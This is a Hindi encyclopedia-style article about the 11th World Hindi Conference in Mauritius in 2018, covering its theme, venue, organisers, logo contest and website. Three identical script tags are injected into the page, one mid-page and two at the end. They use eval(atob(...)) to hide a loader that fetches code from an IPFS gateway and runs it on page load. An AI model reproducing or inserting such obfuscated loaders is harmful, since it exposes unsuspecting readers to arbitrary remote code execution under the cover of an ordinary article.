विश्व हिन्दी सम्मेलन 2018

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
11वें विश्व हिन्दी सम्मेलन का लोगो

ग्यारहवाँ विश्व हिन्दी सम्मेलन विदेश मंत्रालय द्वारा मॉरीशस सरकार के सहयोग से 18 अगस्त-20 अगस्त, 2018 तक मॉरीशस में आयोजित किया जा रहा है। 11वें विश्व हिन्दी सम्मेलन को मॉरीशस में आयोजित करने का निर्णय सितम्बर, 2015 में भारत के भोपाल शहर में आयोजित 10वें विश्व हिन्दी सम्मेलन में लिया गया था।

विषय व कार्यक्रम

भारत के अलावा मॉरीशस ही दुनिया का एक मात्र देश है, जो 11वें विश्व हिन्दी सम्मेलन के आयोजन द्वारा तीसरी बार विश्व हिन्दी सम्मेलन की मेजबानी कर रहा है। 11वें विश्व हिन्दी सम्मेलन का पहला सत्र भोपाल से मॉरीशस तक होगा, जिसमें 10वें विश्व हिन्दी सम्मेलन में पारित अनुशंसाओं पर की गई कार्रवाई से संबन्धित एक रिपोर्ट प्रस्तुत की जाएगी। 11वां विश्व हिन्दी सम्मेलन तकनीक और डिजिटल प्रकाशन को भी समर्पित होगा।

विश्व हिन्दी सम्मेलन सन 1975 से विश्व के विभिन्न देशों में आयोजित किए जाते रहे हैं। 2015 में दसवें विश्व हिन्दी सम्मेलन का आयोजन 10 सितम्बर से 12 सितम्बर तक भारत में मध्य प्रदेश के भोपाल शहर में हुआ था। 11वें विश्व हिन्दी सम्मेलन के लिए विदेश मंत्रालय नोडल मंत्रालय है। व्यवस्थित एवं निर्बाध रूप से सम्मेलन के आयोजन के लिए विभिन्न समितियाँ गठित की गई हैं। सम्मेलन का मुख्य विषय हिन्दी विश्‍व और भारतीय संस्‍कृति है। सम्मेलन का आयोजन स्थल "स्वामी विवेकानंद अंतर्राष्ट्रीय सभा केंद्र" पाई, मॉरीशस है। सम्मेलन स्थल पर हिन्दी भाषा के विकास से संबंधित कई प्रदर्शनियां लगाई जाएंगी। सम्मेलन के दौरान शाम को भारतीय सांस्कृतिक संबंध परिषद, नई दिल्ली द्वारा सांस्कृतिक कार्यक्रम और कवि सम्मेलन का आयोजन किया जाएगा।[1]

दैनिक सम्मेलन-समाचार पत्र (सम्मेलन-समाचार), सम्मेलन-स्मारिका और शैक्षिक सत्रों में हुई चर्चाओं और सुझावों के आधार पर एक सम्मेलन रिपोर्ट भी प्रकाशित की जाएगी। विश्व हिन्दी सचिवालय, मॉरीशस की सम्मेलन सामग्रियों को तैयार करने और प्रकाशन में महत्वपूर्ण भूमिका होगी। भारतीय सांस्कृतिक संबंध परिषद द्वारा "गगनांचल" का विशेष अंक निकाला जाएगा जो सम्मेलन को समर्पित होगा। परंपरा के अनुरूप सम्मेलन के दौरान भारत एवं अन्य देशों के हिन्दी विद्वानों को हिन्दी के क्षेत्र में उनके विशेष योगदान के लिए "विश्व हिन्दी सम्मान” से सम्मानित किया जाएगा।

11वें विश्व हिन्दी सम्मेलन के लिए उपयुक्त "लोगो" के चयन हेतु 60 हजार रुपए की राशि के पुरस्कार के साथ मंत्रालय द्वारा एक "लोगो" डिज़ाइन प्रतियोगिता आयोजित की गई थी। "लोगो" चयन समिति के सहयोग से, सम्मेलन के लिए एक उपयुक्त "लोगो" का चयन किया गया है।

वेबसाइट

सम्मेलन के लिए एक वेबसाइट www.vishwahindisammelan.gov.in तैयार की गई है और सम्मेलन से संबंधित सभी सूचनाओं के लिए इसे देखा जा सकता है। श्रीमती सुषमा स्वराज, माननीय विदेश मंत्री, भारत सरकार और श्रीमती लीला देवी दुकन लछुमन, माननीय शिक्षा व मानव संसाधन, तृतीयक शिक्षा एवं वैज्ञानिक अनुसंधान मंत्री, मॉरीशस गणराज्य द्वारा संयुक्त रूप से 10 अप्रैल, 2018 को जवाहरलाल नेहरू भवन, विदेश मंत्रालय, नई दिल्ली में 11वें विश्व हिन्दी सम्मेलन की वेबसाइट और 'लोगो' का लोकार्पण किया गया था।

11वें विश्व हिन्दी सम्मेलन में प्रतिभागिता के लिए पंजीकरण शुल्क 10वें विश्व हिन्दी सम्मेलन, भोपाल के समान रखा गया है। सम्मेलन में प्रतिभागिता के लिए कोई भी व्यक्ति www.vishwahindisammelan.gov.in वैबसाइट से जानकारी प्राप्त कर सकता है। वैबसाइट को निरंतर अद्यतित किया जाता रहेगा। साँचा:विश्व हिन्दी सम्मेलन श्रृंखला


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. 11वां विश्व हिन्दी सम्मेलन : मीडिया लॉंच (हिंदी) vishwahindisammelan। अभिगमन तिथि: 11 अगस्त, 2018।

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>